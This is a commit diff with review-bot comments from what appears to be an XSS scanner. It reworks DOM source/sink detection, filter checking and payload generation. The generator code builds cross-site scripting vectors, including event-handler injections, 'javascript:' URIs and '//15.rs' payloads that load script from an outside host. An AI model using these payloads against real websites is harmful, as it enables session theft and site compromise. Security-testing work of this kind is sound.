
Commit 0ecedc1

authored
Merge pull request #272 from s0md3v/fixed
3.1.5
2 parents 45e2d47 + 3ff48ae commit 0ecedc1

9 files changed

+233
-236
lines changed


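--- a/core/dom.py
+++ b/core/dom.py
@@ -8,6 +8,7 @@ def dom(response):
 sources = r'''document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage'''
 sinks = r'''eval|evaluate|execCommand|assign|navigate|getResponseHeaderopen|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location'''
 scripts = re.findall(r'(?i)(?s)<script[^>]*>(.*?)</script>', response)
+sinkFound, sourceFound = False, False
 for script in scripts:
 script = script.split('\n')
 num = 1
@@ -31,6 +32,7 @@ def dom(response):
 for part in parts:
 if source in part:
 controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', '\$'))
+sourceFound = True
 line = line.replace(source, yellow + source + end)
 for controlledVariable in controlledVariables:
 allControlledVariables.add(controlledVariable)
@@ -44,12 +46,13 @@ def dom(response):
 sink = newLine[grp.start():grp.end()].replace(' ', '')
 if sink:
 line = line.replace(sink, red + sink + end)
+sinkFound = True
 if line != newLine:
 highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
 num += 1
 except MemoryError:
 pass
-if (yellow and red) in highlighted:
+if sinkFound and sourceFound:
 return highlighted
 else:
 return []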
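Review bot: The new `sinkFound`/`sourceFound` flags are cumulative across every `<script>` block and `sinkFound` is set on any sink-regex hit, so one source in script A plus an unrelated sink in script B is enough for `if sinkFound and sourceFound:` to return `highlighted` with no data-flow link between them; if per-script pairing is intended, reset both flags at the top of the `for script in scripts:` loop. The flags do repair the old `(yellow and red) in highlighted` test, which compared the `red` escape string against whole list elements and could never be true. Separately, the unchanged `sources` pattern in the same hunk reads `history\.(pushState|replaceState)(local|session)Storage` — without a `|` before `(local|session)Storage`, `localStorage`/`sessionStorage` are never matched as standalone sources, and `getResponseHeaderopen` in `sinks` has the same missing `|`. `dom` starts before the first hunk.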

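--- a/core/filterChecker.py
+++ b/core/filterChecker.py
@@ -2,44 +2,32 @@
 
 
 def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
-positions = {}
+positions = occurences.keys()
 sortedEfficiencies = {}
 # adding < > to environments anyway because they can be used in all contexts
 environments = set(['<', '>'])
-for i in range(len(occurences)):
+for i in range(len(positions)):
 sortedEfficiencies[i] = {}
-for i, occurence in zip(range(len(occurences)), occurences.values()):
-environments.add(occurence['context'][1])
-location = occurence['context'][0]
-try:
-attributeName = list(occurence['context'][3].keys())[0]
-attributeValue = list(occurence['context'][3].values())[0]
-except AttributeError:
-attributeName = occurence['context'][3]
-positions[str(i)] = occurence['position']
-if location == 'comment':
+for i in occurences:
+occurences[i]['score'] = {}
+context = occurences[i]['context']
+if context == 'comment':
 environments.add('-->')
-elif location == 'script':
+elif context == 'script':
+environments.add(occurences[i]['details']['quote'])
 environments.add('</scRipT/>')
-elif attributeName == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
-environments.add('&lt;') # so let's add the html entity
-environments.add('&gt;') # encoded versions of < and >
-
+elif context == 'attribute':
+if occurences[i]['details']['type'] == 'value':
+if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
+environments.add('&lt;') # so let's add the html entity
+environments.add('&gt;') # encoded versions of < and >
+if occurences[i]['details']['quote']:
+environments.add(occurences[i]['details']['quote'])
 for environment in environments:
-if environment == '':
-efficiencies = [100 for i in range(len(occurences))]
-else:
+if environment:
 efficiencies = checker(
 url, params, headers, GET, delay, environment, positions, timeout, encoding)
-if len(efficiencies) < len(occurences):
-for i in range(len(occurences) - len(efficiencies)):
-efficiencies.append(0)
-for i, efficiency in zip(range(len(efficiencies)), efficiencies):
-try:
-sortedEfficiencies[i][environment] = efficiency
-except:
-sortedEfficiencies[i] = {}
-sortedEfficiencies[i][environment] = efficiency
-for efficiency, occurence in zip(sortedEfficiencies.values(), occurences.values()):
-occurence['score'] = efficiency
+efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
+for occurence, efficiency in zip(occurences, efficiencies):
+occurences[occurence]['score'][environment] = efficiency
 return occurences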
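Review bot: `sortedEfficiencies` is now dead — new lines 6 and 9–10 still build it, but the rewritten result loop writes straight into `occurences[occurence]['score'][environment]` and nothing reads the dict afterwards, so `sortedEfficiencies = {}` and the `for i in range(len(positions)):` loop can be dropped. `positions` also changed shape from a `{str(i): occurence['position']}` dict to the live view `occurences.keys()`, which is passed into `checker(...)` unchanged; confirm `checker` was updated for that shape, since its values are no longer the recorded positions. The script branch adds `occurences[i]['details']['quote']` to `environments` without the truthiness guard the attribute branch uses and leans on `if environment:` to drop it later; `if occurences[i]['details']['quote']:` on that line would keep the two branches consistent. `efficiencies.extend([0] * (len(occurences) - len(efficiencies)))` assumes `checker` returns a list; if it can return a tuple or `None`, wrap it as `efficiencies = list(checker(...))`.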

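--- a/core/generator.py
+++ b/core/generator.py
@@ -9,116 +9,120 @@ def generator(occurences, response):
 vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
 6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
 for i in occurences:
-context = occurences[i]['context'][0]
-breaker = occurences[i]['context'][1]
-special = occurences[i]['context'][2]
-try:
-attributeName = list(occurences[i]['context'][3].keys())[0]
-attributeValue = list(occurences[i]['context'][3].values())[0]
-except AttributeError:
-attributeName = occurences[i]['context'][3]
-if special not in badTags:
-special = ''
-elif context == 'attribute':
-special = '</' + special + '/>'
-else:
-special = ''
+context = occurences[i]['context']
 if context == 'html':
 lessBracketEfficiency = occurences[i]['score']['<']
 greatBracketEfficiency = occurences[i]['score']['>']
-breakerEfficiency = occurences[i]['score'][breaker]
-if breaker == '\'' or breaker == '"':
-breaker = ''
-breakerEfficiency = 100
 ends = ['//']
+badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
 if greatBracketEfficiency == 100:
 ends.append('>')
-if lessBracketEfficiency == breakerEfficiency == 100:
+if lessBracketEfficiency:
 payloads = genGen(fillings, eFillings, lFillings,
-eventHandlers, tags, functions, ends, breaker, special)
+eventHandlers, tags, functions, ends, badTag)
 for payload in payloads:
 vectors[10].add(payload)
 elif context == 'attribute':
 found = False
-breakerEfficiency = occurences[i]['score'][breaker]
+tag = occurences[i]['details']['tag']
+Type = occurences[i]['details']['type']
+quote = occurences[i]['details']['quote'] or ''
+attributeName = occurences[i]['details']['name']
+attributeValue = occurences[i]['details']['value']
+quoteEfficiency = occurences[i]['score'][quote] if quote in occurences[i]['score'] else 100
 greatBracketEfficiency = occurences[i]['score']['>']
 ends = ['//']
 if greatBracketEfficiency == 100:
 ends.append('>')
-if greatBracketEfficiency == 100 and breakerEfficiency == 100:
+if greatBracketEfficiency == 100 and quoteEfficiency == 100:
 payloads = genGen(fillings, eFillings, lFillings,
-eventHandlers, tags, functions, ends, breaker, special)
+eventHandlers, tags, functions, ends)
 for payload in payloads:
-if breaker:
-payload = payload.replace(breaker, breaker + '>')
-else:
-payload = '>' + payload
+payload = quote + '>' + payload
 found = True
-vectors[6].add(payload)
-if breakerEfficiency == 100:
+vectors[9].add(payload)
+if quoteEfficiency == 100:
 for filling in fillings:
 for function in functions:
-vector = breaker + filling + 'auTOfOcuS' + \
-filling + 'OnFoCUs' + '=' + breaker + function
+vector = quote + filling + r('autofocus') + \
+filling + r('onfocus') + '=' + quote + function
 found = True
-vectors[6].add(vector)
-if breakerEfficiency == 90:
+vectors[8].add(vector)
+if quoteEfficiency == 90:
 for filling in fillings:
 for function in functions:
-vector = '\\' + breaker + filling + 'auTOfOcuS' + filling + \
-'OnFoCUs' + '=' + function + filling + '\\' + breaker
+vector = '\\' + quote + filling + r('autofocus') + filling + \
+r('onfocus') + '=' + function + filling + '\\' + quote
 found = True
-vectors[6].add(vector)
-if attributeName == 'srcdoc':
-if occurences[i]['score']['&lt;']:
-if occurences[i]['score']['&gt;']:
-del ends[:]
-ends.append('%26gt;')
-payloads = genGen(
-fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, '', '')
-for payload in payloads:
+vectors[7].add(vector)
+if Type == 'value':
+if attributeName == 'srcdoc':
+if occurences[i]['score']['&lt;']:
+if occurences[i]['score']['&gt;']:
+del ends[:]
+ends.append('%26gt;')
+payloads = genGen(
+fillings, eFillings, lFillings, eventHandlers, tags, functions, ends)
+for payload in payloads:
+found = True
+vectors[9].add(payload.replace('<', '%26lt;'))
+elif attributeName == 'href' and attributeValue == xsschecker:
+for function in functions:
 found = True
-vectors[9].add(payload.replace('<', '%26lt;'))
-if attributeName.startswith('on'):
-closer = jsContexter(attributeValue)
-breaker = ''
-for char in attributeValue.split(xsschecker)[1]:
-if char in ['\'', '"', '`']:
-breaker = char
-break
-if closer:
+vectors[10].add(r('javascript:') + function)
+elif attributeName.startswith('on'):
+closer = jsContexter(attributeValue)
+quote = ''
+for char in attributeValue.split(xsschecker)[1]:
+if char in ['\'', '"', '`']:
+quote = char
+break
 suffix = '//\\'
 for filling in jFillings:
 for function in functions:
-vector = breaker + closer + filling + function + suffix
+vector = quote + closer + filling + function + suffix
 if found:
 vectors[7].add(vector)
 else:
 vectors[9].add(vector)
-elif breakerEfficiency > 83:
-suffix = '//'
-for filling in jFillings:
+if quoteEfficiency > 83:
+suffix = '//'
+for filling in jFillings:
+for function in functions:
+if '=' in function:
+function = '(' + function + ')'
+if quote == '':
+filling = ''
+vector = '\\' + quote + closer + filling + function + suffix
+if found:
+vectors[7].add(vector)
+else:
+vectors[9].add(vector)
+elif tag in ('script', 'iframe', 'embed', 'object'):
+if attributeName in ('src', 'iframe', 'embed') and attributeValue == xsschecker:
+payloads = ['//15.rs', '\\/\\\\\\/\\15.rs']
+for payload in payloads:
+vectors[10].add(payload)
+elif tag == 'object' and attributeName == 'data' and attributeValue == xsschecker:
 for function in functions:
-if '=' in function:
-function = '(' + function + ')'
-if breaker == '':
-filling = ''
-vector = '\\' + breaker + closer + filling + function + suffix
-if found:
-vectors[7].add(vector)
-else:
-vectors[9].add(vector)
-
+found = True
+vectors[10].add(r('javascript:') + function)
+elif quoteEfficiency == greatBracketEfficiency == 100:
+payloads = genGen(fillings, eFillings, lFillings,
+eventHandlers, tags, functions, ends)
+for payload in payloads:
+payload = quote + '>' + r('</script/>') + payload
+found = True
+vectors[11].add(payload)
 elif context == 'comment':
 lessBracketEfficiency = occurences[i]['score']['<']
 greatBracketEfficiency = occurences[i]['score']['>']
-breakerEfficiency = occurences[i]['score'][breaker]
 ends = ['//']
 if greatBracketEfficiency == 100:
 ends.append('>')
-if lessBracketEfficiency == breakerEfficiency == 100:
+if lessBracketEfficiency == 100:
 payloads = genGen(fillings, eFillings, lFillings,
-eventHandlers, tags, functions, ends, breaker, special)
+eventHandlers, tags, functions, ends)
 for payload in payloads:
 vectors[10].add(payload)
 elif context == 'script':
@@ -130,37 +134,39 @@ def generator(occurences, response):
 else:
 continue
 closer = jsContexter(script)
+quote = occurences[i]['details']['quote']
 scriptEfficiency = occurences[i]['score']['</scRipT/>']
 greatBracketEfficiency = occurences[i]['score']['>']
-breakerEfficiency = occurences[i]['score'][breaker]
+breakerEfficiency = 100
+if quote:
+breakerEfficiency = occurences[i]['score'][quote]
 ends = ['//']
 if greatBracketEfficiency == 100:
 ends.append('>')
 if scriptEfficiency == 100:
 breaker = r('</script/>')
 payloads = genGen(fillings, eFillings, lFillings,
-eventHandlers, tags, functions, ends, breaker, special)
+eventHandlers, tags, functions, ends)
 for payload in payloads:
 vectors[10].add(payload)
 if closer:
 suffix = '//\\'
-if not breaker:
-closer = closer[1:]
-if breakerEfficiency != 100:
-breaker = ''
 for filling in jFillings:
 for function in functions:
-vector = breaker + closer + filling + function + suffix
+vector = quote + closer + filling + function + suffix
 vectors[7].add(vector)
 elif breakerEfficiency > 83:
+prefix = ''
 suffix = '//'
+if breakerEfficiency != 100:
+prefix = '\\'
 for filling in jFillings:
 for function in functions:
 if '=' in function:
 function = '(' + function + ')'
-if breaker == '':
+if quote == '':
 filling = ''
-vector = '\\' + breaker + closer + filling + function + suffix
+vector = prefix + quote + closer + filling + function + suffix
 vectors[6].add(vector)
 index += 1
 return vectors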
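Review bot: New line 102 tests `attributeName in ('src', 'iframe', 'embed')`, but `iframe` and `embed` are tag names (already matched by the enclosing `tag in (...)` check), not attribute names, so the condition presumably should read `if attributeName == 'src' and attributeValue == xsschecker:`. The payloads that branch adds, `'//15.rs'` and `'\\/\\\\\\/\\15.rs'`, point the target at a hard-coded third-party host, so every positive hit makes the tested site load script from a domain the tester does not control; that host should at least be a configurable option with the default documented. In the script hunk, `quote = occurences[i]['details']['quote']` is guarded with `if quote:` for the score lookup but concatenated unguarded at `vector = quote + closer + filling + function + suffix`; if `details['quote']` can be `None` rather than `''`, that line raises `TypeError`, so `quote = occurences[i]['details']['quote'] or ''` as the attribute branch does would be safer. The html branch now fires on `if lessBracketEfficiency:` (any non-zero score) while the comment branch still requires `== 100`; if that relaxation is intended it deserves a comment, otherwise the two should agree. `generator` starts before the first hunk.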
